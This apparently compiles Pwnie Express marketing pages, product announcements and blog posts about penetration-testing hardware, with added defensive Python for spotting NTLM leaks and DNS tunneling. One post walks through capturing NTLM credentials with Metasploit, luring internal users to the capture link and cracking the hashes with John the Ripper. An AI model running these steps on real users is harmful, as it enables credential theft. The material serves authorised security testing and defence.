Vulnerability Assessment and Penetration Testing Across the Enterprise

In this new white paper by Pwnie Express, we provide an overview of vulnerability assessment and penetration testing. We demonstrate why such measures are critical to the long-term health and success of enterprises across vertical industries. We also present the features and benefits of Pwnie Express’s technologies, which are the only vulnerability assessment and penetration testing solutions on the market that assess wired and wireless network security in hard-to-reach remote locations, simply, cost-effectively and on demand.



Today’s increasingly complex enterprise IT infrastructures consist of hundreds if not thousands of systems and subsystems, generally distributed and often in hard-to-reach locations. The growing use of varying technologies by enterprises and their employees, as wired and wireless systems evolve, makes the task of assessing the security risks associated with the seemingly endless stream of vulnerabilities and attack vectors ever more pressing and difficult.

IT security team members need to be all-seeing and all-knowing. They require continuous insight into who and what is hitting their infrastructure and must adopt vulnerability assessment and penetration testing as an integral part of their security and risk management. For IT staffs responsible for maintaining the infrastructure and continually evaluating the security posture, vulnerability assessment and penetration testing will enable them to:

  • See all the things. Vulnerability assessment and penetration testing provides critical visibility, showing the weaknesses in all aspects of an organization’s infrastructure. By obtaining this invaluable insight on demand in both wired and wireless networks, an organization can identify which threats pose real, exploitable risks and can intelligently manage them.
  • Meet compliance mandates. Federal governments and industry consortiums have recognized the escalating cyber crime threat and the subsequent increase in breaches. To mitigate risk they have established regulations like the Payment Card Industry Data Security Standard (PCI DSS). Implementing a strong assessment and testing program enables organizations to produce the information they need to meet compliance and, more importantly, to heighten their actual security posture.
  • Avoid network downtime. In the short term, recovering from a security breach can result in lost revenues and costly, time-consuming OT remediation efforts. In the long term, downtime could lead to customer flight and cost an organization millions of dollars. By preventing interruptions, customers can continue to transact and revenue can continue to flow.
  • Maintain corporate brand. Every single incident of compromised customer data can also be costly to a company’s reputation, as trust is breached. By seeing all the things, organizations gain insight into potential threat vectors across their entire distributed infrastructure, enabling them to prevent or quickly mitigate breaches and ensure their brand equity remains intact.
  • Justify existing security investments. Vulnerability assessment and penetration testing validates the effectiveness of an organization’s current security infrastructure. The increased visibility can be used to demonstrate what, if any, additional security technologies need to be instituted and/or security measures need to be taken.


Focused on Making Network Security Improvement Easier

I want to explain my excitement about joining the Pwnie Express team and talk about what we are doing. I am excited to join Dave Porcello. For those of you who are new to Pwnie Express, Dave founded the company after he developed a way to easily assess the security of remote locations with low profile Pwn Plugs that work the moment they are plugged in. He then created a very cool Pwn Pad to arm mobile security professionals charged with protecting their organizations.

A couple of years ago, Dave left his day job and started selling these stealthy plugs full time out of his basement in Vermont. The Pwn Plugs and Pads are smart and pack an incredible amount of capability into a small device, costing just over $1,000 each. These powerful, low profile little gems can see all the wired and wireless connections in a location, and that’s only the beginning of what they can do. 406 Ventures and Fairhaven Capital invested in Dave and his idea, and I had the opportunity to join him.

We have now opened a small office in Boston’s Seaport and maintain our research lab in Vermont. We are building a team that is focused on continuing to make it incredibly simple to see all the things in your remote networks, wired and wireless, and know if and how your network security is working.

Most companies have limited knowledge of what’s going on in remote locations because assessments are costly and difficult to conduct in distributed enterprises with far-flung branch offices, and because firewalls by design limit visibility and testing. Because Pwnie Express operates without compromising security policies and the devices can be easily shipped and plugged in, we make it effortless for organizations to monitor all of their remote locations from one point.

Stay tuned as we develop new, straightforward and more powerful devices as well as a secure central service that will make it simple to see and know about all the things running in your remote locations.

We believe it is important to make it easy for organizations to improve their network security while dramatically lowering the costs to assess remote locations.

Pwnie Express Releases Next Generation of Groundbreaking Pwn Pad

Vulnerability Intelligence and Penetration Testing Tablet is Faster, Lighter and Easier to Use than Ever

December 18, 2013

Pwnie Express today announced the release of the latest version of its lauded Pwn Pad, a tablet that provides IT professionals unprecedented mobility and ease of use in assessing wired and wireless networks.

The latest model in the company’s line of vulnerability intelligence and penetration testing devices, the Pwn Pad 2014 is faster, thinner, lighter, sharper and easier to use than ever. The ideal choice for pentesters who are on the road or conducting a company or agency walk-through, the new version of the Pwn Pad, with its 7” tablet screen, offers a streamlined ‘one-click’ software update process, making it easy to update.

“We are thrilled to announce the latest version of the Pwn Pad,” said Dave Porcello, Pwnie Express CTO and founder. “Using the popular Nexus 7 tablet from Google, the Pwn Pad 2014 offers a custom Android front-end with one-touch pentesting applications as well as a custom Kali Linux back-end with a comprehensive pentesting suite.”

Pwn Pad Core Features Include:

  • Custom Android front-end with one-touch pentesting applications, including Evil AP, Strings Watch, Full-Packet Capture, Bluetooth Scan, & SSL Strip
  • Custom Kali Linux back-end with comprehensive pentesting suite, including Metasploit, SET, Kismet, Aircrack-NG, SSLstrip, Ettercap-NG, Bluelog, Wifite, Reaver, MDK3, & FreeRADIUS-WPE
  • Simple web-based administration and in-product updates with “Pwnie UI”
  • 6 different covert channels to tunnel through application-aware firewalls & IPS
  • High performance CPU/GPU, large HD display, powerful battery (up to 9 hours active use)
  • External high-gain Bluetooth supporting packet injection (up to 1000 ft)
  • External USB-Ethernet adapter for wired network pentesting

Pwnie Express provides cost-effective, rapid-deployment products composed of innovative sensors, available in a variety of form factors, that deliver previously unattainable intelligence and make it incredibly easy to evaluate risk in remote and distributed environments. More than 1,000 enterprises across verticals including retail, finance, health, and manufacturing, as well as service providers and government organizations, rely on Pwnie Express to know who and what is accessing their networks.

About Pwnie Express
Pwnie Express is the leading provider of innovative sensors that assess network and wireless security risks in remote locations. Over 1000 enterprises and government organizations worldwide rely on Pwnie Express’s products to conduct drop-box penetration testing and receive unprecedented insight into their distributed network infrastructure. Pwnie Express’s smart devices leverage open source tools and platforms. The award-winning products are backed by the expertise of Pwnie Labs, the company’s security research arm.


European Parliament Gets PWNED

By Rene Millman

On Monday the 25th of November a memo was released to the European Parliament Free Software User Group mailing list announcing that the public wireless network was going to be disabled. This is in response to a man-in-the-middle style attack which successfully intercepted traffic between cell phones and the unencrypted wireless network.

UK tech blog IT Pro did a write-up of the attack in which they suggest that the attack occurred when “hackers set up an ‘evil twin’ wireless router near the building in Strasbourg and had stolen the usernames and passwords of 14 people at the European Parliament.”

“As more employees bring their own devices into the workplace, businesses face the challenge of enforcing corporate security policies on consumer devices that are not solely controlled by the IT department,” said Jason Hart, vice president of cloud solutions at security firm SafeNet. “Most employees now store a wide range of both personal and business information on their mobile devices, so this lack of control exposes businesses to serious security vulnerabilities in the form of data breaches and unauthorised access.”

This sounds strikingly similar to the “Evil AP” tool offered on Pwnie Express’ Pwn Pad line of products.

In the Evil AP attack, the Pwn Pad tablet identifies networks which are being requested by other devices in its area. It accepts the connection requests and routes their traffic through to the Internet, allowing for redirection to malicious services or, as in the case of the European Parliament, interception of transmitted data and credentials. Devices with insecure wireless configurations are easily identifiable using this technique.

Announcing the Pwn Plug R2!

Today we’re very proud to announce a new product, the Pwn Plug R2.

This brand new release builds on the massive success of the Pwn Plug Elite, and brings with it a number of customer-requested features.

Ars Technica says it best: “inside, it’s really a Linux-powered NSA-in-a-box, providing white hat hackers and corporate network security professionals a “drop box” system that can be remotely controlled over a covert Internet channel or a cellular data connection.”

Hardware-wise, we have great news: no more external dongles for dual Ethernet or wireless! The R2 has onboard high-gain wireless and dual Ethernet, external high-gain Bluetooth, 4G/GSM cellular, and more built-in storage.

This release also brings the newest version of our Pwnix software to the device as well, allowing the system to be updated easily, and laying the groundwork for integration with other Pwnie Express products.

We’ll be at Black Hat and DEFCON all week showing it off. Stop by, say hello, and take a look at the R2!



UPDATE: Yep, we’ll absolutely still be supporting the original Pwn Plug via the regular support channels.

Capturing Integrated Windows Authentication with the Plug

The fine folks over at the Gentleman’s Hacker’s Club recently dropped a fun tidbit about the GoDaddy URL Shortener leaking NTLM creds over the Internet. It’s worth mentioning that the vulnerability of the browser auto-submitting credentials isn’t specific to GoDaddy; it applies to anyone using an IE browser on a domain-joined machine. It’s odd that credentials were being submitted over the Internet, but this is presumably specific to their URL shortener setup.

It turns out that capturing NTLM credentials is a very relevant attack vector, especially on internal networks. The reason the Windows browser submits credentials is a feature called Integrated Windows Authentication. This works particularly well on internal networks, as the default is to allow automatic authentication to hosts in the local LAN (the Intranet zone). Here’s a quick demo of how to test for it using the Pwn Plug:

First, open up a shell, and fire up the metasploit framework:

    root@pwnix-dev:$ cd /opt/metasploit/msf3
    root@pwnix-dev:$ ./msfconsole
    MSF> use auxiliary/server/capture/http_ntlm
    MSF (http_ntlm)> set JOHNPWFILE /tmp/creds.txt
    MSF (http_ntlm)> set URIPATH /capture
    MSF (http_ntlm)> set SRVPORT 8080

Once you’ve configured the http_ntlm module, it should look something like this when you type ‘info’:

Run ‘exploit -z’ in order to start the server and you should see:

    [*] Auxiliary module execution completed
    [*] Using URL:
    [*]  Local IP:
    [*] Server started.

Great, now we’re capturing any credentials sent to the Plug. Even if Integrated Windows Authentication isn’t configured, a user browsing to this site will see an authentication prompt.

Simply send out your link to internal folks, or post it to some location where it will be noticed and clicked. Distribution is left as an exercise for the reader.

Once we have some captured credentials in our /tmp/creds.txt file, we’ll want to fire up John the Ripper and get to cracking. You’ll need the latest John with the jumbo patch in order to crack the NTLM hashes, so grab that first:

    pwnie@pwnix-dev:$ wget
    pwnie@pwnix-dev:$ tar -zxvf john-1.7.9-jumbo-7.tar.gz
    pwnie@pwnix-dev:$ cd john-1.7.9-jumbo-7/src
    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/src$ make generic
    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/src$ cd ../run

    pwnie@pwnix-dev:~/john-1.7.9-jumbo-7/run:$ ./john /tmp/creds.txt_netntlm
    Loaded 2 password hashes with no different salts (NTLMv1 C/R MD4 DES (ESS MD5) [32/64])
    test             (test)
    test             (test)
    guesses: 2  time: 0:00:00:00 DONE (Fri Jan 18 09:47:10 2013)  c/s: 70600  trying: test!!! - tst

And there you have it, simple & easy credential stealing.

If you want to take this attack a little further, take a look at @zfasel’s ZackAttack project which relays credentials to the domain, allowing you to easily pop a shell via a submitted NTLM credential.
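The leak this post describes, a domain-joined browser auto-answering an NTLM challenge from an Internet host, shows up in a web proxy log. The following Python is an added example, not Pwnie Express code: it decodes NTLM Authorization tokens from constructed proxy log lines, pulls the domain and user out of Type 3 (AUTHENTICATE) messages, and flags any NTLM exchange with a host outside an assumed internal suffix list. The log format, the INTERNAL_SUFFIXES allowlist and the sample hosts are assumptions.

```python
import base64
import struct

INTERNAL_SUFFIXES = (".corp.example",)  # assumed hosts where IWA is expected

def build_type3(domain, user, workstation="WS01"):
    """Constructed NTLM AUTHENTICATE (Type 3) test message; LM/NT responses are zero dummies."""
    fields, payload = [], b""
    for blob in (b"\x00" * 24, b"\x00" * 24, domain.encode("utf-16-le"),   # LM, NT, domain
                 user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""):
        fields.append(struct.pack("<HHI", len(blob), len(blob), 64 + len(payload)))  # header is 64 bytes
        payload += blob
    flags = 0x00000001 | 0x00000200  # NEGOTIATE_UNICODE | NEGOTIATE_NTLM
    return b"NTLMSSP\x00" + struct.pack("<I", 3) + b"".join(fields) + struct.pack("<I", flags) + payload

def parse_ntlm(token_b64):
    """Return (msg_type, domain, user) for a base64 NTLM token, or None if it is not NTLM."""
    try:
        msg = base64.b64decode(token_b64)
    except ValueError:
        return None
    if len(msg) < 12 or msg[:8] != b"NTLMSSP\x00":
        return None
    msg_type = struct.unpack_from("<I", msg, 8)[0]
    if msg_type != 3 or len(msg) < 64:
        return (msg_type, "", "")
    enc = "utf-16-le" if struct.unpack_from("<I", msg, 60)[0] & 0x1 else "latin-1"  # NegotiateFlags
    def field(pos):  # security buffer: Len, MaxLen, Offset
        length, _maxlen, offset = struct.unpack_from("<HHI", msg, pos)
        return msg[offset:offset + length].decode(enc, "replace")
    return (3, field(28), field(36))  # DomainNameFields at 28, UserNameFields at 36

def scan_proxy_log(lines):
    """Flag NTLM negotiation or credentials sent to hosts outside INTERNAL_SUFFIXES.
    Constructed log format: timestamp, client, destination host, Authorization value (tab-separated)."""
    findings = []
    for line in lines:
        ts, client, host, auth = line.rstrip("\n").split("\t")
        parsed = parse_ntlm(auth[5:]) if auth.startswith("NTLM ") else None
        if parsed is None or host.endswith(INTERNAL_SUFFIXES):
            continue
        msg_type, domain, user = parsed
        what = {1: "NTLM negotiate", 3: f"NTLM credentials for {domain}\\{user}"}
        findings.append(f"{ts} {client} sent {what.get(msg_type, f'NTLM type {msg_type}')} to {host}")
    return findings

def _tok(msg):
    return "NTLM " + base64.b64encode(msg).decode()

# Constructed sample: an expected intranet auth, then the same browser answering a challenge from an external host.
SAMPLE_LOG = [
    "2013-01-18T09:47:10\t10.0.0.5\tintranet.corp.example\t" + _tok(build_type3("CORP", "alice")),
    "2013-01-18T09:47:12\t10.0.0.5\tshort.example.net\t" + _tok(b"NTLMSSP\x00" + struct.pack("<I", 1) + b"\x00" * 20),
    "2013-01-18T09:47:13\t10.0.0.5\tshort.example.net\t" + _tok(build_type3("CORP", "alice")),
]
```

Running scan_proxy_log over SAMPLE_LOG reports the two messages to short.example.net and stays silent on the intranet host.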

Exfiltration and Covert Channels in Cyber Defense Magazine

Hey all, we wanted to give you a heads-up on an article we put together for the new Cyber Defense Magazine. The article talks about current data exfiltration techniques, both automated and manual, and the tools commonly used in that environment. Here’s a small excerpt from the article:

A point of access must first be established; this is what is traditionally referred to as the security breach. This commonly occurs via a client-side exploit, weak system credentials, or SQL injection. According to recent reports, the most common technique used today by sentient attackers is via your own remote access applications, such as RDP or even your own VPN.

Once that point of access is obtained, the attacker then goes looking for interesting data in the environment. Data at rest is often gathered via built-in Windows shares or FTP, and data in transit is gathered with a variety of techniques, the most common of which is now parsing memory, where data is unencrypted and available for the taking.

Attackers are likely to use your own built-in tools to exfiltrate data too. Because these remote access tools are typically encrypted, and traditionally hard to inspect, this is an easy way for the attacker to pull data out of the environment without detection. One of the best things you can do to protect yourself is monitor usage of the channels, and watch for anomalies.

Today’s malware is also using common Internet protocols to send your data out. Partly because of the complexity of automating remote access solutions, and partly because of the availability of HTTPS, FTP and SMTP libraries, these protocols are often used by malware to send data out of the environment.

The article goes on to talk about advanced techniques in data exfiltration, something we’ve focused on a lot here at Pwnie Express:

Using a technique called “tunneling,” data can be encrypted in archives or in transit, limiting the ability to inspect it at a proxying firewall; it just looks like traffic over HTTP/S, or DNS, or ICMP, among others. These are commonly referred to as “covert channels.” With covert channels, attackers can hide what they are saying or passing by writing a message inside a message, much like steganography can hide a picture inside a picture.

We fact-checked against the recent breach reports, specifically Trustwave’s excellent ‘Global Security Report’. If you’re interested in the full article, check out Cyber Defense Magazine.
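The excerpt’s advice is to monitor the channels and watch for anomalies. As an added example (not from the article or from Pwnie Express), the Python below scores constructed DNS query log lines for one tunneling signature: many distinct, long, high-entropy leftmost labels under a single parent domain from one client, which is what base-encoded payload chunks look like. The log format and the thresholds are assumptions.

```python
import math
from collections import defaultdict

# Constructed sample DNS query log: "<timestamp> <client> <qtype> <qname>".
SAMPLE_DNS_LOG = """\
2013-01-18T09:47:10 10.0.0.5 A www.example.org
2013-01-18T09:47:11 10.0.0.5 TXT 3q2bzj7vq4nfkx2r9ml0wcz8tv.tun.example.net
2013-01-18T09:47:11 10.0.0.5 TXT 8fn2krvzq1ydl0x7tp3gsbj5we.tun.example.net
2013-01-18T09:47:12 10.0.0.5 TXT z0k9wqrfl2tmx8vb3ysjp4ncd7.tun.example.net
2013-01-18T09:47:12 10.0.0.5 TXT p7ldt2xq9rzk4nv1wcb8fmjs3y.tun.example.net
2013-01-18T09:47:13 10.0.0.6 A mail.example.org
2013-01-18T09:47:14 10.0.0.6 A cdn.example.org
""".splitlines()

def shannon_entropy(s):
    """Bits per character of s; encoded payload labels score far higher than ordinary hostnames."""
    if not s:
        return 0.0
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def parent_domain(qname, levels=2):
    """Registered-domain approximation: the last `levels` labels (tun.example.net -> example.net)."""
    return ".".join(qname.rstrip(".").split(".")[-levels:])

def score_dns_log(lines, min_queries=3, min_label_len=20, min_entropy=3.5):
    """Flag (client, parent domain) pairs whose leftmost labels look like encoded payload:
    many unique, long, high-entropy labels. Thresholds are assumptions for this demo."""
    stats = defaultdict(lambda: {"labels": set(), "qtypes": set()})
    for line in lines:
        _ts, client, qtype, qname = line.split()
        st = stats[(client, parent_domain(qname))]
        st["labels"].add(qname.split(".")[0])
        st["qtypes"].add(qtype)
    findings = []
    for (client, parent), st in stats.items():
        labels = st["labels"]
        if len(labels) < min_queries:
            continue  # too few distinct labels to judge
        avg_len = sum(len(l) for l in labels) / len(labels)
        avg_ent = sum(shannon_entropy(l) for l in labels) / len(labels)
        if avg_len >= min_label_len and avg_ent >= min_entropy:
            findings.append({"client": client, "domain": parent, "queries": len(labels),
                             "avg_label_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2),
                             "qtypes": sorted(st["qtypes"])})
    return findings
```

On the sample, only the 10.0.0.5 traffic under example.net is flagged; the ordinary A lookups for example.org never reach the label thresholds.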

PC Mag Editors’ Choice Review

Pwn Plug Product Review by PC Magazine

by Fahmida Y. Rashid

Pwn Plug (Basic: $480, Elite: $770) is a harmless-looking little white device that makes it possible to run penetration tests against any network easily and unobtrusively. A mini-computer that looks more like an oversized power adapter, it comes pre-loaded with various hacking tools to probe open ports on networks, sniff incoming and outgoing data packets, hijack SSL traffic, and crack wireless encryption keys, among others. With Pwn Plug, security teams can scan and check the security of their networks, making it an invaluable part of any network administrator’s arsenal of tools.



Distributed Penetration Testing Becomes Easy With Pwnie Express Citadel PX

By Ritu Saxena

Pwnie Express, a company founded in late 2009 with a mission to provide innovative security assessment products for today’s enterprises, has recently announced an all-new security assessment and remote penetration testing product for distributed enterprises called Citadel PX. Citadel PX forms the core of Pwnie Express’s vision of controlling enterprise-wide penetration testing and security assessment from a single interface.

Citadel PX is a scalable, rapid-deployment solution backed by hardware or virtual sensors which continuously monitor the network, run vulnerability assessments, and conduct penetration tests from anywhere in the world. The console, or Command Post, serves as a central interface to manage the sensors and gather results. Once the sensors are installed and configured, they initiate a reverse connection back to the Command Post, giving IT admins control of their capabilities and automation.
